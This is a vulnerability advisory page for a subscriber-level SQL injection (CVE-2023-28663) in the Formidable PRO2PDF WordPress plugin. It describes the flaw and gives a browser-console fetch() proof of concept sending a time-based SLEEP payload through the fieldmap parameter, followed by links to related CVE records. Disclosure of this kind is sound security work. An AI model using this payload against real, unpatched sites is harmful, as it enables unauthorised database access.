Lucene search
WpvulndbWPEX-ID:DFA283F6-B0F3-4AA1-9FC4-52E2474C9F80HistoryMar 22, 2023 - 12:00 a.m.
Formidable PRO2PDF < 3.11 - Subscriber+ SQLi
2023-03-2200:00:00
wpvulndb
63
web browser command sql injection
0.001 Low
EPSS
Percentile
31.1%
The plugin does not properly sanitise and escape the fieldmap parameter before using it in a SQL statement via the fpropdf_export_file AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber
Run the below command in the developer console of the web browser while being on the blog as subscriber user
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=fpropdf_export_file&fieldmap=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));Related
wpvulndb
wpvulndb
Formidable PRO2PDF < 3.11 - Subscriber+ SQLi
2023-03-22 00:00:00
prion
prion
Sql injection
2023-03-22 21:15:00
nvd
nvd
CVE-2023-28663
2023-03-22 21:15:18
cvelist
cvelist
CVE-2023-28663
2023-03-22 00:00:00
cve
cve
CVE-2023-28663
2023-03-22 21:15:18
openvas
openvas
WordPress Formidable PRO2PDF Plugin < 3.10 SQLi Vulnerability
2023-09-12 00:00:00